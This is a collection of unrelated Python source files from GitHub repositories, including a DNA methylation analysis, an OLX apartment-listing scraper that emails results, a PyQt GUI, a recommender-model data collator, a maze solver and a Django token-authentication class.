pdm.Annotations(\n name='annotations',\n type='450k',\n exclude='bad_cpgs',\n select_dict={\n 'CHR': ['-X', '-Y']\n }\n)\ntarget_other = get_target(data_other.base)\nobservables_other = pdm.Observables(\n name='observables',\n types={}\n)\ncells_other = pdm.Cells(\n name='cells_horvath_calculator',\n types='any'\n)\nattributes_other = pdm.Attributes(\n target=target_other,\n observables=observables_other,\n cells=cells_other\n)\ndata_params_other = get_data_params(data_other.base)\nconfig_other = pdm.load_beta_config(\n data_other,\n annotations_other,\n attributes_other,\n data_params_other\n)\n\ncpgs_unn = list(set(config_unn.cpg_list).intersection(config_unn.base_dict.keys()))\ncpgs_other = list(set(config_other.cpg_list).intersection(config_other.base_dict.keys()))\ncommon_cpgs = list(set(cpgs_unn).intersection(set(cpgs_other)))\n\nmetrics = [\n 'item',\n 'aux_unn',\n 'aux_other',\n 'corr_coeff',\n 'p_value',\n 'p_value_benjamini_hochberg',\n 'p_value_bonferroni'\n]\nresult = {}\nfor key in metrics:\n result[key] = []\n\nfor cpg_id, cpg in tqdm(enumerate(common_cpgs), mininterval=60.0, desc='cpgs_processing'):\n betas_unn = config_unn.base_data[config_unn.base_dict[cpg], config_unn.attributes_indexes]\n label_unn = [1] * len(betas_unn)\n betas_other = config_other.base_data[config_other.base_dict[cpg], config_other.attributes_indexes]\n label_other = [0] * len(betas_other)\n betas_all = np.concatenate((betas_unn, betas_other), axis=0)\n label_all = np.asarray(label_unn + label_other)\n\n if len(set(label_all)) != 2:\n raise RuntimeError('x variable is not binary in pbc')\n\n corr_coeff, p_value = pointbiserialr(label_all, betas_all)\n\n result['corr_coeff'].append(corr_coeff)\n result['p_value'].append(p_value)\n\n result['item'].append(cpg)\n aux = ''\n if cpg in config_unn.cpg_gene_dict:\n aux = ';'.join(config_unn.cpg_gene_dict[cpg])\n result['aux_unn'].append(aux)\n aux = ''\n if cpg in config_other.cpg_gene_dict:\n aux = ';'.join(config_other.cpg_gene_dict[cpg])\n result['aux_other'].append(aux)\n\npvals = np.asarray(result['p_value'])\nreject, pvals_corr, alphacSidak, alphacBonf = multipletests(\n pvals,\n 0.05,\n method='fdr_bh'\n)\nresult['p_value_benjamini_hochberg'] = pvals_corr\n\nreject, pvals_corr, alphacSidak, alphacBonf = multipletests(\n pvals,\n 0.05,\n method='bonferroni'\n)\nresult['p_value_bonferroni'] = pvals_corr\n\nsave_table_dict_xlsx(f'{save_path}/pbc_vs_GSE87571', result)\n","repo_name":"GillianGrayson/dna-methylation","sub_path":"dna-methylation/unn_epic/dataset_specific.py","file_name":"dataset_specific.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24655054544","text":"import requests\nfrom typing import List, Dict, Optional, Tuple, Generator\nimport json\nfrom dataclasses import dataclass\nimport datetime\nimport os\nimport smtplib\nimport pandas\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.application import MIMEApplication\n\n# Check README.md for a guide to how to get an url for specified category, location and other filters that you need\nURLS_TO_SCRAPE = {\n \"Łódź mieszkania wynajem\": \"https://www.olx.pl/api/v1/offers/?offset=40&limit=40&category_id=15&sort_by=created_at%3Adesc&filter_refiners=spell_checker&sl=18ae25cfa80x3938008f\",\n\n}\n\n# Email configuration\n# Add env variables to AWS Lambda environment variables - guide in README.md\n# This configuration is used for sending emails by using Gmail\nsmtp_server = 
\"smtp.gmail.com\"\nsmtp_port = 587\nsmtp_username = os.environ[\"SMTP_USERNAME\"]\nsmtp_password = os.environ[\"SMTP_PASSWORD\"]\nfrom_email = os.environ[\"FROM_EMAIL\"]\nto_email = os.environ[\"TO_EMAIL\"]\n\n# The number of days from which offers are to come\nDAY_DELAY: int = 1\n\n\n@dataclass\nclass Params:\n name: str\n label: str\n\n\n@dataclass\nclass Price:\n value: float\n currency: str\n\n\n@dataclass\nclass Object:\n url: str\n title: str\n created_time: datetime.datetime\n city: Optional[str] = None\n district: Optional[str] = None\n region: Optional[str] = None\n price: Optional[Price] = None\n params: Optional[List[Params]] = None\n\n\nclass GetOlxContent:\n \"\"\"\n The `GetOlxContent` class is used to fetch content from the OLX website.\n\n Attributes:\n main_url (str): The main URL of the OLX website.\n\n Methods:\n fetch_content() -> List[Dict]: Fetches the content from the OLX website and returns it as a list of dictionaries.\n get_next_page_url(json_data) -> Optional[str]: Extracts the URL of the next page from the given JSON data.\n\n \"\"\"\n\n def __init__(self, url: str):\n self.main_url = url\n\n def fetch_content(self) -> List[Dict]:\n result = []\n\n while self.main_url:\n try:\n response = requests.get(self.main_url)\n if response.status_code == 200:\n json_data = json.loads(response.content)\n if not json_data:\n break\n\n # Add scraped data to list\n result.append(json_data)\n self.main_url = self.get_next_page_url(json_data)\n\n except Exception as e:\n print(e)\n\n return result\n\n @staticmethod\n def get_next_page_url(json_data) -> Optional[str]:\n links = json_data.get(\"links\")\n if links:\n next_page = links.get(\"next\")\n if next_page:\n return next_page.get(\"href\")\n\n return None\n\n\ndef send_email(filename: str, subject: str) -> None:\n \"\"\"\n Sends an email with an attachment using the given parameters. The email is sent from the 'from_email' address to the 'to_email' address.\n \"\"\"\n message = MIMEMultipart()\n message[\"From\"] = from_email\n message[\"To\"] = to_email\n message[\"Subject\"] = subject\n\n with open(filename, \"rb\") as file:\n attachment = MIMEApplication(file.read())\n attachment.add_header(\"Content-Disposition\", \"attachment\", filename=filename)\n message.attach(attachment)\n\n with smtplib.SMTP(smtp_server, smtp_port) as server:\n server.starttls()\n server.login(smtp_username, smtp_password)\n server.sendmail(from_email, to_email, message.as_string())\n\n\ndef parse_params(params) -> Tuple[List[Optional[Params]], Optional[Price]]:\n \"\"\"\n Parse the given params to create a list of Params objects and extract the Price object.\n\n :param params: A list of dictionaries representing the params.\n :return: A tuple containing the list of Params objects and the Price object.\n \"\"\"\n params_list = []\n price = None\n\n for param in params:\n key, label = param[\"key\"], param[\"value\"][\"label\"]\n if key == \"price\":\n price = Price(\n value=param.get(\"value\", {}).get(\"value\"),\n currency=param.get(\"value\", {}).get(\"currency\"),\n )\n\n params_list.append(\n Params(\n name=key,\n label=label\n )\n )\n\n return params_list, price\n\n\ndef parse_data(data: List[Dict]) -> Generator[Object, None, None]:\n \"\"\"\n This method `parse_data` takes a list of dictionaries as input and returns a generator object. Each dictionary in the input list represents an item, and within that item, there is a nested \"data\" key which contains a list of offers. 
Each offer is further processed using the `parse_params` function to extract parameters and price.\n\n :param data: A list of dictionaries representing items, with each item containing a \"data\" key which contains a list of offers.\n :return: A generator object that yields instances of the Object class.\n \"\"\"\n for item in data:\n for offer in item[\"data\"]:\n params, price = parse_params(offer[\"params\"])\n\n yield Object(\n url=offer[\"url\"],\n title=offer[\"title\"],\n created_time=offer[\"created_time\"],\n city=offer.get(\"location\", {}).get(\"city\", {}).get(\"name\"),\n district=offer.get(\"location\", {}).get(\"district\", {}).get(\"name\"),\n region=offer.get(\"location\", {}).get(\"region\", {}).get(\"name\"),\n price=price,\n params=params\n )\n\n\ndef scrape(name, url_to_scrape) -> None:\n \"\"\"\n Scrape data from a given URL and save it to an Excel file.\n\n :param name: The name of the scrape.\n :param url_to_scrape: The URL to scrape data from.\n :return: None\n \"\"\"\n scraper = GetOlxContent(url_to_scrape)\n data = scraper.fetch_content()\n objects = parse_data(data)\n\n dicts = []\n for idx, object_ in enumerate(objects):\n params_dict = {}\n for param in object_.params:\n params_dict[param.name] = param.label\n\n dicts.append(\n {\n \"url\": object_.url,\n \"title\": object_.title,\n \"created_time\": object_.created_time,\n \"city\": object_.city if object_.city else None,\n \"district\": object_.district if object_.district else None,\n \"region\": object_.region if object_.region else None,\n \"price_val\": object_.price.value if object_.price else None,\n \"price_cur\": object_.price.currency if object_.price else None,\n **params_dict,\n }\n )\n\n df = pandas.DataFrame(dicts)\n df.to_excel(\"/tmp/olx.xlsx\", index=False)\n\n send_email(filename=\"/tmp/olx.xlsx\", subject=name)\n\n\ndef run() -> bool:\n \"\"\"\n Executes the scraping process for each URL provided in the `URLS_TO_SCRAPE` dictionary.\n \"\"\"\n for name, url_to_scrape in URLS_TO_SCRAPE.items():\n print(f\"Start scraping {name}...\")\n scrape(name, url_to_scrape)\n\n return True\n\n\ndef lambda_handler(event, context):\n return {\n 'statusCode': 200,\n 'body': json.dumps({\"message\": \"Scraped\", \"status\": run()})\n }\n","repo_name":"DEENUU1/olx-notification","sub_path":"olx_notification/compute/olx.py","file_name":"olx.py","file_ext":"py","file_size_in_byte":7222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"44151144275","text":"from PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, \\\n QGridLayout, QWidget, QPushButton, QMenuBar, QMenu, \\\n QStatusBar, QAction, QSizePolicy\nimport sys\nfrom visualtools import VisualTools\nfrom automatagrid import AutomataGrid\nfrom itemlist import ItemList\nfrom terminal import Terminal\n\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.resize(1143, 732)\n self.setWindowTitle(\"FireDES\")\n\n self.centralWidget = QWidget(self)\n self.layout = QGridLayout(self.centralWidget)\n self.centralWidgetSetup()\n\n self.visualTools = VisualTools(self.centralWidget)\n self.layout.addWidget(self.visualTools, 0, 0)\n\n self.menuBarSetup()\n\n self.automataGrid = AutomataGrid(self.centralWidget)\n self.layout.addWidget(self.automataGrid, 0, 1)\n\n self.itemList = ItemList(self.centralWidget)\n self.layout.addWidget(self.itemList, 0, 2)\n\n self.terminal = Terminal(self.centralWidget)\n 
self.layout.addWidget(self.terminal, 1, 0, 1, 3)\n\n def centralWidgetSetup(self):\n self.setCentralWidget(self.centralWidget)\n sizePolicy = QSizePolicy(QSizePolicy.Maximum,\n QSizePolicy.Maximum)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.centralWidget.sizePolicy().hasHeightForWidth())\n self.centralWidget.setSizePolicy(sizePolicy)\n\n def menuBarSetup(self):\n self.menuFile = self.menuBar().addMenu(\"File\")\n self.menuEdit = self.menuBar().addMenu(\"Edit\")\n self.menuView = self.menuBar().addMenu(\"View\")\n self.menuTools = self.menuBar().addMenu(\"Tools\")\n self.menuRun = self.menuBar().addMenu(\"Run\")\n self.menuHelp = self.menuBar().addMenu(\"Help\")\n\ndef main():\n app = QApplication(sys.argv)\n main_window = MainWindow()\n main_window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"aaamourao/FireDES_GUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22188243777","text":"import time\nstartPos1 = input(\"Podaj pozycję startową króla np. A2 B4 \")\nendPos1 = input(\"Podaj końcową pozycję króla np. H7 E5 \")\nstartPos = [startPos1[0],int(startPos1[1])]\nendPos = [endPos1[0],int(endPos1[1])]\ncurrentPos = startPos\nileruchow = 0\njakieruchy = []\nstartime = time.time()\nif(startPos[1] > 8 or endPos[1] > 8):\n print(\"Za duża liczba\")\n exit()\n\ntranslatee = [\n {\"letter\": \"A\",\"number\": 1},\n {\"letter\": \"B\",\"number\": 2},\n {\"letter\": \"C\",\"number\": 3},\n {\"letter\": \"D\",\"number\": 4},\n {\"letter\": \"E\",\"number\": 5},\n {\"letter\": \"F\",\"number\": 6},\n {\"letter\": \"G\",\"number\": 7},\n {\"letter\": \"H\",\"number\": 8},\n]\n\nfor trans in translatee:\n if(trans[\"letter\"] == currentPos[0]):\n currentPos[0] = trans[\"number\"]\n if(trans[\"letter\"] == endPos[0]):\n endPos[0] = trans[\"number\"]\n\n\nwhile(1 == 1):\n if(currentPos[0] < endPos[0] and currentPos[1] < endPos[1]):\n currentPos[0] += 1\n currentPos[1] += 1\n jakieruchy.append(\"NE\")\n ileruchow +=1\n continue\n if(currentPos[0] > endPos[0] and currentPos[1] > endPos[1]):\n currentPos[0] -= 1\n currentPos[1] -= 1\n jakieruchy.append(\"SW\")\n ileruchow +=1\n continue\n if(currentPos[0] > endPos[0] and currentPos[1] < endPos[1]):\n currentPos[0] -= 1\n currentPos[1] += 1\n jakieruchy.append(\"NW\")\n ileruchow +=1\n continue\n if(currentPos[0] < endPos[0] and currentPos[1] > endPos[1]):\n currentPos[0] += 1\n currentPos[1] -= 1\n jakieruchy.append(\"SE\")\n ileruchow +=1\n continue\n if(currentPos[0] < endPos[0] and not currentPos[1] < endPos[1]):\n currentPos[0] += 1\n jakieruchy.append(\"E\")\n ileruchow +=1\n continue\n if(currentPos[1] < endPos[1] and not currentPos[0] < endPos[0]):\n currentPos[1] += 1\n jakieruchy.append(\"N\")\n ileruchow +=1\n continue\n if(currentPos[0] > endPos[0] and not currentPos[1] > endPos[1]):\n currentPos[0] -= 1\n jakieruchy.append(\"W\")\n ileruchow +=1\n continue\n if(currentPos[1] > endPos[1] and not currentPos[0] > endPos[0]):\n currentPos[1] -= 1\n jakieruchy.append(\"S\")\n ileruchow +=1\n continue\n\n\n if(currentPos[0] == endPos[0] and currentPos[1] == endPos[1]):\n break\n\nprint(ileruchow)\nfor ruch in jakieruchy:\n print(ruch,end= \" \")\nprint(\"\\n\")\nendtime = time.time()\nprint(\"Czas:\", 
endtime-startime+\"s\")\ninput()","repo_name":"Nskubix/Przygotowania","sub_path":"Czerwiec2023/PosuwanieKróla.py","file_name":"PosuwanieKróla.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14917660600","text":"from typing import Optional, Union, List, Dict, Tuple\nfrom dataclasses import dataclass\nfrom recformer import RecformerTokenizer\nimport torch\nimport unicodedata\nimport random\n\n\n# Data collator\n@dataclass\nclass PretrainDataCollatorWithPadding:\n\n tokenizer: RecformerTokenizer\n tokenized_items: Dict\n mlm_probability: float\n\n def __call__(self, batch_item_ids: List[Dict[str, Union[List[int], List[List[int]], torch.Tensor]]]) -> Dict[str, torch.Tensor]:\n\n '''\n features: A batch of list of item ids\n 1. sample training pairs\n 2. convert item ids to item features\n 3. mask tokens for mlm\n\n input_ids: (batch_size, seq_len)\n item_position_ids: (batch_size, seq_len)\n token_type_ids: (batch_size, seq_len)\n attention_mask: (batch_size, seq_len)\n global_attention_mask: (batch_size, seq_len)\n '''\n \n batch_item_seq_a, batch_item_seq_b = self.sample_pairs(batch_item_ids)\n batch_feature_a = self.extract_features(batch_item_seq_a)\n batch_feature_b = self.extract_features(batch_item_seq_b)\n\n batch_encode_features_a = self.encode_features(batch_feature_a)\n batch_encode_features_b = self.encode_features(batch_feature_b)\n batch_a = self.tokenizer.padding(batch_encode_features_a, pad_to_max=False)\n batch_b = self.tokenizer.padding(batch_encode_features_b, pad_to_max=False)\n\n batch_a[\"mlm_input_ids\"], batch_a[\"mlm_labels\"] = self.mask_mlm(batch_encode_features_a)\n batch_b[\"mlm_input_ids\"], batch_b[\"mlm_labels\"] = self.mask_mlm(batch_encode_features_b)\n\n batch = dict()\n\n for k, v in batch_a.items():\n batch[k+'_a'] = torch.LongTensor(v)\n \n for k, v in batch_b.items():\n batch[k+'_b'] = torch.LongTensor(v)\n\n return batch\n\n def sample_pairs(self, batch_item_ids):\n\n batch_item_seq_a = []\n batch_item_seq_b = []\n\n for item_ids in batch_item_ids:\n\n item_ids = item_ids['items']\n item_seq_len = len(item_ids)\n start = (item_seq_len-1) // 2\n target_pos = random.randint(start, item_seq_len-1)\n batch_item_seq_a.append(item_ids[:target_pos])\n batch_item_seq_b.append([item_ids[target_pos]])\n\n return batch_item_seq_a, batch_item_seq_b\n\n\n def extract_features(self, batch_item_seq):\n\n features = []\n\n for item_seq in batch_item_seq:\n feature_seq = []\n for item in item_seq:\n input_ids, token_type_ids = self.tokenized_items[item]\n feature_seq.append([input_ids, token_type_ids])\n features.append(feature_seq)\n\n return features\n\n def encode_features(self, batch_feature):\n \n features = []\n for feature in batch_feature:\n features.append(self.tokenizer.encode(feature, encode_item=False))\n\n return features\n\n def mask_mlm(self, flat_features):\n\n input_ids = [e[\"input_ids\"] for e in flat_features]\n\n batch_input = self._collate_batch(input_ids)\n\n mask_labels = []\n for e in flat_features:\n ref_tokens = []\n for id in e[\"input_ids\"]:\n token = self.tokenizer._convert_id_to_token(id)\n ref_tokens.append(token)\n\n mask_labels.append(self._whole_word_mask(ref_tokens))\n\n batch_mask = self._collate_batch(mask_labels)\n inputs, labels = self.mask_tokens(batch_input, batch_mask)\n\n return inputs, labels\n\n def _whole_word_mask(self, input_tokens: List[str], max_predictions=512):\n\n cand_indexes = []\n\n for (i, token) in 
enumerate(input_tokens):\n\n if token == self.tokenizer.bos_token or token == self.tokenizer.eos_token:\n continue\n\n if self._is_subword(token) and len(cand_indexes) > 0:\n cand_indexes[-1].append(i)\n else:\n cand_indexes.append([i])\n\n random.shuffle(cand_indexes)\n num_to_predict = min(max_predictions, max(1, int(round(len(input_tokens) * self.mlm_probability))))\n masked_lms = []\n covered_indexes = set()\n for index_set in cand_indexes:\n if len(masked_lms) >= num_to_predict:\n break\n # If adding a whole-word mask would exceed the maximum number of\n # predictions, then just skip this candidate.\n if len(masked_lms) + len(index_set) > num_to_predict:\n continue\n is_any_index_covered = False\n for index in index_set:\n if index in covered_indexes:\n is_any_index_covered = True\n break\n if is_any_index_covered:\n continue\n for index in index_set:\n covered_indexes.add(index)\n masked_lms.append(index)\n\n assert len(covered_indexes) == len(masked_lms)\n mask_labels = [1 if i in covered_indexes else 0 for i in range(len(input_tokens))]\n return mask_labels\n\n def _is_subword(self, token: str):\n if (\n not self.tokenizer.convert_tokens_to_string(token).startswith(\" \")\n and not self._is_punctuation(token[0])\n ):\n return True\n \n return False\n\n @staticmethod\n def _is_punctuation(char: str):\n # obtained from:\n # https://github.com/huggingface/transformers/blob/5f25a5f367497278bf19c9994569db43f96d5278/transformers/tokenization_bert.py#L489\n cp = ord(char)\n if (cp >= 33 and cp <= 47) or (cp >= 58 and cp <= 64) or (cp >= 91 and cp <= 96) or (cp >= 123 and cp <= 126):\n return True\n cat = unicodedata.category(char)\n if cat.startswith(\"P\"):\n return True\n return False\n\n\n def mask_tokens(self, inputs: torch.Tensor, mask_labels: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:\n \"\"\"\n Prepare masked tokens inputs/labels for masked language modeling: 80% MASK, 10% random, 10% original. Set\n 'mask_labels' means we use whole word mask (wwm), we directly mask idxs according to it's ref.\n \"\"\"\n\n if self.tokenizer.mask_token is None:\n raise ValueError(\n \"This tokenizer does not have a mask token which is necessary for masked language modeling. 
Remove the --mlm flag if you want to use this tokenizer.\"\n )\n labels = inputs.clone()\n # We sample a few tokens in each sequence for masked-LM training (with probability args.mlm_probability defaults to 0.15 in Bert/RoBERTa)\n\n probability_matrix = mask_labels\n\n special_tokens_mask = [\n self.tokenizer.get_special_tokens_mask(val, already_has_special_tokens=True) for val in labels.tolist()\n ]\n probability_matrix.masked_fill_(torch.tensor(special_tokens_mask, dtype=torch.bool), value=0.0)\n if self.tokenizer._pad_token is not None:\n padding_mask = labels.eq(self.tokenizer.pad_token_id)\n probability_matrix.masked_fill_(padding_mask, value=0.0)\n\n masked_indices = probability_matrix.bool()\n labels[~masked_indices] = -100 # We only compute loss on masked tokens\n\n # 80% of the time, we replace masked input tokens with tokenizer.mask_token ([MASK])\n indices_replaced = torch.bernoulli(torch.full(labels.shape, 0.8)).bool() & masked_indices\n inputs[indices_replaced] = self.tokenizer.convert_tokens_to_ids(self.tokenizer.mask_token)\n\n # 10% of the time, we replace masked input tokens with random word\n indices_random = torch.bernoulli(torch.full(labels.shape, 0.5)).bool() & masked_indices & ~indices_replaced\n random_words = torch.randint(len(self.tokenizer), labels.shape, dtype=torch.long)\n inputs[indices_random] = random_words[indices_random]\n\n # The rest of the time (10% of the time) we keep the masked input tokens unchanged\n return inputs, labels\n\n\n def _collate_batch(self, examples, pad_to_multiple_of: Optional[int] = None):\n \"\"\"Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary.\"\"\"\n # Tensorize if necessary.\n if isinstance(examples[0], (list, tuple)):\n examples = [torch.tensor(e, dtype=torch.long) for e in examples]\n\n # Check if padding is necessary.\n length_of_first = examples[0].size(0)\n are_tensors_same_length = all(x.size(0) == length_of_first for x in examples)\n if are_tensors_same_length and (pad_to_multiple_of is None or length_of_first % pad_to_multiple_of == 0):\n return torch.stack(examples, dim=0)\n\n # If yes, check if we have a `pad_token`.\n if self.tokenizer._pad_token is None:\n raise ValueError(\n \"You are attempting to pad samples but the tokenizer you are using\"\n f\" ({self.tokenizer.__class__.__name__}) does not have a pad token.\"\n )\n\n # Creating the full tensor and filling it with our data.\n max_length = max(x.size(0) for x in examples)\n if pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):\n max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of\n result = examples[0].new_full([len(examples), max_length], self.tokenizer.pad_token_id)\n for i, example in enumerate(examples):\n if self.tokenizer.padding_side == \"right\":\n result[i, : example.shape[0]] = example\n else:\n result[i, -example.shape[0] :] = example\n return result\n\n\n@dataclass\nclass FinetuneDataCollatorWithPadding:\n\n tokenizer: RecformerTokenizer\n tokenized_items: Dict\n\n def __call__(self, batch_item_ids: List[Dict[str, Union[List[int], List[List[int]], torch.Tensor]]]) -> Dict[str, torch.Tensor]:\n\n '''\n features: A batch of list of item ids\n 1. sample training pairs\n 2. convert item ids to item features\n 3. 
mask tokens for mlm\n\n input_ids: (batch_size, seq_len)\n item_position_ids: (batch_size, seq_len)\n token_type_ids: (batch_size, seq_len)\n attention_mask: (batch_size, seq_len)\n global_attention_mask: (batch_size, seq_len)\n '''\n \n batch_item_seq, labels = self.sample_train_data(batch_item_ids)\n batch_feature = self.extract_features(batch_item_seq)\n batch_encode_features = self.encode_features(batch_feature)\n batch = self.tokenizer.padding(batch_encode_features, pad_to_max=False)\n batch[\"labels\"] = labels\n\n for k, v in batch.items():\n batch[k] = torch.LongTensor(v)\n \n return batch\n\n def sample_train_data(self, batch_item_ids):\n\n batch_item_seq = []\n labels = []\n\n for item_ids in batch_item_ids:\n\n item_ids = item_ids['items']\n item_seq_len = len(item_ids)\n start = min(item_seq_len, 0)\n target_pos = random.randint(start, item_seq_len-1)\n batch_item_seq.append(item_ids[:target_pos])\n labels.append(item_ids[target_pos])\n\n return batch_item_seq, labels\n\n\n def extract_features(self, batch_item_seq):\n\n features = []\n\n for item_seq in batch_item_seq:\n feature_seq = []\n for item in item_seq:\n input_ids, token_type_ids = self.tokenized_items[item]\n feature_seq.append([input_ids, token_type_ids])\n features.append(feature_seq)\n\n return features\n\n def encode_features(self, batch_feature):\n \n features = []\n for feature in batch_feature:\n features.append(self.tokenizer.encode(feature, encode_item=False))\n\n return features\n\n\n@dataclass\nclass EvalDataCollatorWithPadding:\n\n tokenizer: RecformerTokenizer\n tokenized_items: Dict\n\n def __call__(self, batch_data: List[Dict[str, Union[int, List[int], List[List[int]], torch.Tensor]]]) -> Dict[str, torch.Tensor]:\n\n '''\n features: A batch of list of item ids\n 1. sample training pairs\n 2. convert item ids to item features\n 3. 
mask tokens for mlm\n\n input_ids: (batch_size, seq_len)\n item_position_ids: (batch_size, seq_len)\n token_type_ids: (batch_size, seq_len)\n attention_mask: (batch_size, seq_len)\n global_attention_mask: (batch_size, seq_len)\n '''\n \n batch_item_seq, labels = self.prepare_eval_data(batch_data)\n batch_feature = self.extract_features(batch_item_seq)\n batch_encode_features = self.encode_features(batch_feature)\n batch = self.tokenizer.padding(batch_encode_features, pad_to_max=False)\n\n for k, v in batch.items():\n batch[k] = torch.LongTensor(v)\n\n labels = torch.LongTensor(labels)\n \n return batch, labels\n\n def prepare_eval_data(self, batch_data):\n\n batch_item_seq = []\n labels = []\n\n for data_line in batch_data:\n\n item_ids = data_line['items']\n label = data_line['label']\n \n batch_item_seq.append(item_ids)\n labels.append(label)\n\n return batch_item_seq, labels\n\n\n def extract_features(self, batch_item_seq):\n\n features = []\n\n for item_seq in batch_item_seq:\n feature_seq = []\n for item in item_seq:\n input_ids, token_type_ids = self.tokenized_items[item]\n feature_seq.append([input_ids, token_type_ids])\n features.append(feature_seq)\n\n return features\n\n def encode_features(self, batch_feature):\n \n features = []\n for feature in batch_feature:\n features.append(self.tokenizer.encode(feature, encode_item=False))\n\n return features","repo_name":"AaronHeee/RecFormer","sub_path":"collator.py","file_name":"collator.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"78"} +{"seq_id":"33283285903","text":"import curses\nfrom curses import wrapper\nimport queue\nimport time\n\nmaze = [\n [\"#\", \"#\", \"#\", \"#\", \"#\", \"O\", \"#\", \"#\", \"#\"],\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\n [\"#\", \" \", \"#\", \"#\", \" \", \"#\", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \" \", \" \", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\"],\n [\"#\", \" \", \"#\", \" \", \"#\", \" \", \"#\", \"#\", \"#\"],\n [\"#\", \" \", \" \", \" \", \" \", \" \", \" \", \" \", \"#\"],\n [\"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"#\", \"X\", \"#\"]\n]\n\n\ndef display_maze(maze, stdscr, track=[]):\n GREEN = curses.color_pair(1)\n YELLOW = curses.color_pair(2)\n\n\n for i, row in enumerate(maze):\n for j, value in enumerate(row):\n if (i, j) in track:\n stdscr.addstr(i, j*2, \"X\", YELLOW)\n else:\n stdscr.addstr(i, j*2, value, GREEN)\n \n\n\n \ndef get_start(maze, start):\n for i, row in enumerate(maze):\n for j, value in enumerate(row):\n if value == start:\n return i, j\n\n return None\n\n\n\ndef get_track(maze, stdscr):\n start = \"O\"\n end = \"X\"\n start_point = get_start(maze, start)\n\n que = queue.Queue()\n que.put((start_point, [start_point]))\n\n visited = set()\n\n while not que.empty():\n current_point, track = que.get()\n r, c = current_point\n\n stdscr.clear()\n display_maze(maze, stdscr, track)\n time.sleep(0.2)\n stdscr.refresh()\n\n if maze[r][c] == end:\n return track\n\n neighbours = get_neighbours(maze, r, c)\n for neighbour in neighbours:\n if neighbour in visited:\n continue\n\n row, col = neighbour\n if maze[row][col] == \"#\":\n continue\n\n new_track = track + [neighbour]\n que.put((neighbour, new_track))\n visited.add(neighbour)\n\n\ndef get_neighbours(maze, row, column):\n neighbours = []\n\n if row > 0:\n 
neighbours.append((row-1, column))\n if row + 1 < len(maze):\n neighbours.append((row+1, column)) \n if column > 0:\n neighbours.append((row, column-1))\n if column + 1 < len(maze[0]):\n neighbours.append((row, column+1))\n\n return neighbours \n\n\ndef main(stdscr):\n curses.init_pair(1, curses.COLOR_GREEN, curses.COLOR_BLACK)\n curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK)\n\n get_track(maze, stdscr)\n stdscr.getch()\n\n\nwrapper(main)\n","repo_name":"Adejumok/Track-Finder","sub_path":"track_finder.py","file_name":"track_finder.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3139764664","text":"# BOJ 2186\nimport sys\n\nsi = sys.stdin.readline\n\n\ndef dfs(x, y, idx):\n if dp[x][y][idx] > -1:\n return dp[x][y][idx]\n\n if idx >= len(word):\n return 1\n\n dp[x][y][idx] = 0\n for i in range(4):\n for j in range(1, k + 1):\n nx = x + j * dx[i]\n ny = y + j * dy[i]\n if nx < 0 or nx >= n or ny < 0 or ny >= m:\n continue\n\n if board[nx][ny] != word[idx]:\n continue\n\n dp[x][y][idx] += dfs(nx, ny, idx + 1)\n return dp[x][y][idx]\n\n\nn, m, k = map(int, si().split())\nboard = []\nfor _ in range(n):\n board.append(list(si().strip()))\n\nword = si().strip()\n\ndp = [[[-1 for _ in range(81)] for _ in range(101)] for _ in range(101)]\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\nres = 0\nfor i in range(n):\n for j in range(m):\n if board[i][j] == word[0]:\n res += dfs(i, j, 1)\nprint(res)","repo_name":"mrbartrns/algorithm-and-structure","sub_path":"BOJ/exaustive_search_boj/word_board_r2.py","file_name":"word_board_r2.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32319539666","text":"# -*- coding: utf-8 -*-\n\n\nimport datetime\nimport json\nimport time\n\nfrom django.db import transaction\nfrom rest_framework import exceptions\nfrom rest_framework.authentication import TokenAuthentication\n\nfrom Core.celeryTask import CeleryTask\nfrom Core.configs import *\nfrom Core.lib import *\nfrom Core.serializers import *\nfrom Data.data import IPaddress, Website\n\n\nclass BaseAuth(TokenAuthentication):\n def authenticate_credentials(self, key):\n # Search token in cache\n cache_user = cache.get(key)\n if cache_user:\n return cache_user, key\n\n model = self.get_model()\n try:\n token = model.objects.select_related('user').get(key=key)\n except model.DoesNotExist:\n raise exceptions.AuthenticationFailed()\n\n if not token.user.is_active:\n raise exceptions.AuthenticationFailed()\n\n time_now = datetime.datetime.now()\n\n if token.created < time_now - datetime.timedelta(minutes=EXPIRE_MINUTES):\n token.delete()\n raise exceptions.AuthenticationFailed()\n\n if token:\n # Cache token\n cache.set(key, token.user, EXPIRE_MINUTES * 60)\n\n return token.user, token\n\n\nclass 